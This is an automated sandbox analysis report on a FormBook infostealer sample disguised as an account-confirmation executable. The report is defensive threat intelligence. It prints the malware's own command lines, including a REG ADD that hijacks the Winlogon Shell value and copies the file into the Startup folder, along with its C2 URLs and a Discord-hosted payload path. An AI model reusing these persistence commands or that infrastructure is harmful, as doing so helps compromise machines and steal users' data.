Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Hesab#U0131 Onaylay#U0131n

Overview

General Information

Sample Name:Hesab#U0131 Onaylay#U0131n (renamed file extension from none to exe)
Analysis ID:567552
MD5:7600223383061fab23f27e42c7cf74c6
SHA1:e67e679c0f9730e02451d13394b06aab55e2b6e0
SHA256:712d99f8fa44abad1c6e9395b8236c6a7a1247c767e51721445111a22568742c
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Drops PE files to the startup folder
Writes to foreign memory regions
Exploit detected, runtime environment starts unknown processes
Exploit detected, runtime environment dropped PE file
Machine Learning detection for sample
Uses ping.exe to check the status of other devices and networks
Injects a PE file into a foreign processes
Uses ping.exe to sleep
.NET source code contains method to dynamically call methods (often used by packers)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Moves itself to temp directory
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
HTTP GET or POST without a user agent
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion NT Autorun Keys Modification
Drops PE files
Checks if the current process is being debugged
Creates a start menu entry (Start Menu\Programs\Startup)
Uses reg.exe to modify the Windows registry
Creates a process in suspended mode (likely to inject code)
Sigma detected: Autorun Keys Modification

Classification

Process Tree

  • System is w10x64
  • Hesab#U0131 Onaylay#U0131n.exe (PID: 6232 cmdline: "C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exe" MD5: 7600223383061FAB23F27E42C7CF74C6)
    • cmd.exe (PID: 6304 cmdline: cmd" /c ping 127.0.0.1 -n 13 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exe, MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • PING.EXE (PID: 6980 cmdline: ping 127.0.0.1 -n 13 MD5: 70C24A306F768936563ABDADB9CA9108)
      • reg.exe (PID: 6960 cmdline: REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exe," MD5: CEE2A7E57DF2A159A065A34913A055C2)
    • java.exe (PID: 5368 cmdline: "C:\Users\user\AppData\Local\Temp\java.exe" MD5: 7600223383061FAB23F27E42C7CF74C6)
      • cmd.exe (PID: 636 cmdline: cmd" /c ping 127.0.0.1 -n 12 > nul && copy "C:\Users\user\AppData\Local\Temp\java.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exe" && ping 127.0.0.1 -n 12 > nul && "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 4140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • PING.EXE (PID: 1144 cmdline: ping 127.0.0.1 -n 12 MD5: 70C24A306F768936563ABDADB9CA9108)
        • PING.EXE (PID: 4788 cmdline: ping 127.0.0.1 -n 12 MD5: 70C24A306F768936563ABDADB9CA9108)
        • java.exe (PID: 5968 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exe MD5: 7600223383061FAB23F27E42C7CF74C6)
          • AddInProcess32.exe (PID: 3108 cmdline: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe MD5: F2A47587431C466535F3C3D3427724BE)
  • java.exe (PID: 2528 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exe" MD5: 7600223383061FAB23F27E42C7CF74C6)
    • AddInProcess32.exe (PID: 6784 cmdline: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe MD5: F2A47587431C466535F3C3D3427724BE)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • wlanext.exe (PID: 4448 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: CD1ED9A48316D58513D8ECB2D55B5C04)
          • cmd.exe (PID: 6468 cmdline: /c del "C:\Users\user\AppData\Local\Temp\AddInProcess32.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • cmd.exe (PID: 5792 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
Hesab#U0131 Onaylay#U0131n.exeSUSP_PE_Discord_Attachment_Oct21_1Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
  • 0x7e568:$x1: https://cdn.discordapp.com/attachments/

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeSUSP_PE_Discord_Attachment_Oct21_1Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
  • 0x7e568:$x1: https://cdn.discordapp.com/attachments/

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000022.00000000.562360179.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000022.00000000.562360179.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000022.00000000.562360179.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
    • 0x16af8:$sqlite3text: 68 38 2A 90 C5
    • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
    00000021.00000002.655660259.0000000001BF0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000021.00000002.655660259.0000000001BF0000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 67 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      33.0.AddInProcess32.exe.400000.6.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        33.0.AddInProcess32.exe.400000.6.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        33.0.AddInProcess32.exe.400000.6.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x15cc9:$sqlite3step: 68 34 1C 7B E1
        • 0x15ddc:$sqlite3step: 68 34 1C 7B E1
        • 0x15cf8:$sqlite3text: 68 38 2A 90 C5
        • 0x15e1d:$sqlite3text: 68 38 2A 90 C5
        • 0x15d0b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15e33:$sqlite3blob: 68 53 D8 7F 8C
        34.2.AddInProcess32.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          34.2.AddInProcess32.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 48 entries

          Sigma Overview

          System Summary

          barindex
          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exe,, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 6960, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton: Data: Details: explorer.exe,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exe,, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 6960, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
          Source: Process startedAuthor: frack113: Data: Command: cmd" /c ping 127.0.0.1 -n 13 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exe,, CommandLine: cmd" /c ping 127.0.0.1 -n 13 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exe,, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exe" , ParentImage: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exe, ParentProcessId: 6232, ProcessCommandLine: cmd" /c ping 127.0.0.1 -n 13 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exe,, ProcessId: 6304
          Source: Process startedAuthor: frack113: Data: Command: cmd" /c ping 127.0.0.1 -n 13 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exe,, CommandLine: cmd" /c ping 127.0.0.1 -n 13 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exe,, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exe" , ParentImage: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exe, ParentProcessId: 6232, ProcessCommandLine: cmd" /c ping 127.0.0.1 -n 13 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exe,, ProcessId: 6304

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: Hesab#U0131 Onaylay#U0131n.exeReversingLabs: Detection: 30%
          Yara detected FormBook
          Source: Yara matchFile source: 33.0.AddInProcess32.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 34.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 33.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 33.0.AddInProcess32.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 33.0.AddInProcess32.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 34.0.AddInProcess32.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 33.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 34.0.AddInProcess32.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 34.0.AddInProcess32.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 33.0.AddInProcess32.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 34.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 33.0.AddInProcess32.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 34.0.AddInProcess32.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 34.0.AddInProcess32.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000022.00000000.562360179.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000021.00000002.655660259.0000000001BF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000025.00000002.808079827.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001F.00000002.592834200.000000000499F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000022.00000000.561892180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000025.00000002.807067648.0000000002C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000021.00000000.558484436.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.360269598.0000000003CB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000022.00000002.653301219.0000000001580000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001E.00000002.592270936.000000000453F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000024.00000000.618178805.00000000069B6000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000024.00000000.620167553.0000000005B3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001F.00000002.593184990.0000000004A19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000021.00000000.558921224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000025.00000002.805766092.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001E.00000002.592449978.00000000045B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000021.00000002.653589818.0000000001880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000022.00000002.651959941.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000021.00000002.652361426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000024.00000000.617344321.0000000005B3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000026.00000002.655815851.0000000000A30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.425092835.00000000048D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000024.00000000.622582494.00000000069B6000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000022.00000002.655749775.00000000018F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: http://www.navairahotels.club/g43o/?j0DLG=bAWbi/S+VaXJXK1VOIIWAoiCvWF75BpNHpODYmQiY/o6icgk09bMbNIwGdiM5kcgz4ya&zl_PqJ=KxlpdRmXzNBLJpD0Avira URL Cloud: Label: phishing
          Source: http://www.athletes4africa.biz/g43o/?j0DLG=XuLail99yhDrYyUhKwxkqBfGD2vc/Hu9afcS26YM4Nd4m4Phs+vvTj1Fs76Yca0I+p5F&zl_PqJ=KxlpdRmXzNBLJpD0Avira URL Cloud: Label: malware
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeReversingLabs: Detection: 27%
          Machine Learning detection for sample
          Source: Hesab#U0131 Onaylay#U0131n.exeJoe Sandbox ML: detected
          Machine Learning detection for dropped file
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeJoe Sandbox ML: detected
          Source: 33.0.AddInProcess32.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 33.2.AddInProcess32.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 33.0.AddInProcess32.exe.400000.8.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 34.0.AddInProcess32.exe.400000.8.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 34.2.AddInProcess32.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 33.0.AddInProcess32.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 34.0.AddInProcess32.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 34.0.AddInProcess32.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: Hesab#U0131 Onaylay#U0131n.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.3:49752 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.3:49755 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.3:49811 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.3:49820 version: TLS 1.0
          Source: Hesab#U0131 Onaylay#U0131n.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
          Source: Binary string: AddInProcess32.pdb source: java.exe, 0000000F.00000002.428056679.000000000D492000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.417436505.000000000D492000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.417244405.000000000D491000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000021.00000000.558563855.0000000000F02000.00000002.00000001.01000000.00000008.sdmp, AddInProcess32.exe, 00000022.00000000.559551250.0000000000BE2000.00000002.00000001.01000000.00000008.sdmp
          Source: Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 00000021.00000002.654677430.00000000019DF000.00000040.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000021.00000002.653659262.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000022.00000002.653434243.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000022.00000003.570961490.0000000001420000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000022.00000002.654127914.00000000016DF000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: cmd.pdbUGP source: AddInProcess32.exe, 00000022.00000002.657074804.00000000035E0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: AddInProcess32.exe, 00000021.00000002.654677430.00000000019DF000.00000040.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000021.00000002.653659262.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000022.00000002.653434243.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000022.00000003.570961490.0000000001420000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000022.00000002.654127914.00000000016DF000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wlanext.pdb source: AddInProcess32.exe, 00000021.00000002.657097783.00000000038E0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: AddInProcess32.pdbpw source: java.exe, 0000000F.00000002.428056679.000000000D492000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.417436505.000000000D492000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.417244405.000000000D491000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000021.00000000.558563855.0000000000F02000.00000002.00000001.01000000.00000008.sdmp, AddInProcess32.exe, 00000022.00000000.559551250.0000000000BE2000.00000002.00000001.01000000.00000008.sdmp
          Source: Binary string: cmd.pdb source: AddInProcess32.exe, 00000022.00000002.657074804.00000000035E0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wlanext.pdbGCTL source: AddInProcess32.exe, 00000021.00000002.657097783.00000000038E0000.00000040.10000000.00040000.00000000.sdmp
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeFile opened: C:\Users\user\AppData\Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeFile opened: C:\Users\user\Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior

          Software Vulnerabilities

          barindex
          Exploit detected, runtime environment starts unknown processes
          Source: C:\Users\user\AppData\Local\Temp\java.exeProcess created: C:\Windows\SysWOW64\cmd.exe
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeCode function: 4x nop then jmp 02194390h0_2_021940E8
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]0_2_02194AF9
          Source: C:\Users\user\AppData\Local\Temp\java.exeCode function: 4x nop then jmp 02E94390h15_2_02E940E8
          Source: C:\Users\user\AppData\Local\Temp\java.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]15_2_02E94AF9
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 4x nop then jmp 02B14390h30_2_02B140E8
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]30_2_02B14B08
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]30_2_02B14AF9

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.athletes4africa.biz
          Source: C:\Windows\explorer.exeNetwork Connect: 212.123.41.108 80
          Source: C:\Windows\explorer.exeNetwork Connect: 15.197.142.173 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.98.99.30 80
          Source: C:\Windows\explorer.exeNetwork Connect: 104.21.21.198 80
          Source: C:\Windows\explorer.exeDomain query: www.feasible-weld.com
          Source: C:\Windows\explorer.exeDomain query: www.sturgisbrews.com
          Source: C:\Windows\explorer.exeDomain query: www.navairahotels.club
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeDomain query: www.aireapartmentsmsp.com
          Source: C:\Windows\explorer.exeDomain query: www.balderzone.com
          Uses ping.exe to check the status of other devices and networks
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 13
          Source: global trafficHTTP traffic detected: GET /attachments/939413016561205300/939787018140012564/RDi HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /attachments/939413016561205300/939787018140012564/RDi HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /attachments/939413016561205300/939787018140012564/RDi HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
